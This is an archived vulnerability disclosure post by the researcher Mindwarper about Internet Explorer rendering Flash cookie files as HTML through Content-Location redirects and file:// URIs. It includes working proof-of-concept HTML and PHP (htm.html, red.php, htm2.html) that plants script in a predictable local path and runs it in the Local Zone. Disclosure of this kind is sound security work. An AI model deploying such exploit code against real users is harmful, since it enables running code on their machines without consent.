Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Browsers :: bt1618.txt

Internet Explorer Vulnerability: Content-Location works with both triple and double slash





After I reported the Content-Location Vulnerability (http://www.securityfocus.com/archive/1/342317), 
Thor Larholm explained that the html execution was not caused by the Content-Location header, but instead 
by the triple slash (file:///). 
I have tested it with double slash and I even tested the triple slash without the Content-Location header, 
but neither worked.
The difference between triple slash and double slash is that in triple htm.html loads the cookie in the iframe,
and with double slash it causes the whole page to try and load the cookie which would then require the user
to press Back and then refresh the page.

I have created 2 proof-of-concepts which show how both vulnerabilities can not be exploited separately.

1. http://mlsecurity.com/ie/wee.php

This page will create a flash cookie and when you press continue it will load htm.html which contains an iframe. 
This iframe will load red.php which contains the Content-Location header pointing at the flash cookie. 
The flash cookie location will only have a double slash (file://).

wee.php  - Loads a flash movie which creates a cookie in 
C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol


htm.html
******************************
<html>
<script type="text/javascript" src="querystring.js"></script>
<script>

document.write(unescape("%3Ciframe%20name%3D%22wee2%22%20src%3D%22red.php%3Fa%3D" + QueryString['a'] + "%26drive%3D" + QueryString['drive'] + "%22%3E%3C/iframe%3E"));

</script>
<br><p>
Sometimes the iframe doesn't load properly. If the iframe shows a white blank page then press refresh.
<p>
You will know when the exploit worked when the iframe shows weird stuff like my_Array0Sven1kelor2.
<p>

The script assumes you are under windows 2000/XP logged on as administrator.<br>


If you are not logged on as administrator type the username you're logged in under in the box below and press Go Go Go.<p>

<form method="GET">
Logged on to windows as user: <input type=text name="a" value="administrator"><br>
Windows is installed on drive: <input type=text name="drive" value="C"><br>
<input type=submit value="Go Go Go">
</form>

<p>

This should create a file called mlsecurity.txt in your c:\ drive.

<p>

<a href="exp.php">How it works?</a>

</html>
******************************

red.php
******************************
$a = $_GET["a"];
if(!$a || $a=="undefined")
{
	$a="administrator";
}
if($_GET["drive"] && !strstr($_GET["drive"],"unde"))
{
	$d=$_GET["drive"];
}else
{
	$d="C";
}
 header("Location: file://".$d.":/Documents and Settings/".$a."/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol");

******************************





2. http://mlsecurity.com/ie/ie.php

This proof-of-concept only uses the triple slash method to open the cookie in an iframe.

ie.php - Loads a flash movie which creates a cookie in C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol

htm2.html
******************************
<html>


	<iframe src="file:///C:/Documents and Settings/administrator/Application Data/Macromedia/Flash Player/mlsecurity.com/mlsecurity.sol"></iframe>

 <p>
Note: you might need to edit the html to fit your system.  
<p>

Macromedia Flash Player is reported to store Flash cookies (.sol files) in a predictable location on client systems.  
Other attacks are possible given the ability to store content on a system in a predictable location, such as 
referencing the content via a file:// URI.  This is compounded by the fact that an attacker could include HTML 
and script code in the cookie, which may be interpreted by Internet Explorer or possibly other browsers.  
In the example of Internet Explorer, such content would be interpreted in the context of the Local Zone.  
Successful exploitation would still require the attacker to guess the local username of the victim.
<br>
<br>This issue is reported to affect versions of the player for Microsoft Windows operating systems.  
Other versions may also be affected.  Macromedia Director MX is similarly affected.
<br>
<br>This issue was originally covered by Securityfocus.com BID 8886 but has been determined to be a distinct 
issue in Macromedia Flash. Securityfocus.com BID 8886 was also updated with additional technical details 
describing a new issue in Internet Explorer.  The original report for these issues was a proof-of-concept
 provided by Mindwarper which exploited both of the issues simultaneously.
<p>


- Discovered by Mindwarper<br>
</html>

******************************


I have tested these pages on both win2k sp4 ie6 fully patched and on winXP. 
I even tried using a few IE hacks and it still worked.

-----------------------------|
- Mindwarper                 |
- mindwarper@linuxmail.org   |
- http://mlsecurity.com      |
-----------------------------|

-- 
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org 
This allows you to send and receive SMS through your mailbox.


Powered by Outblaze


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH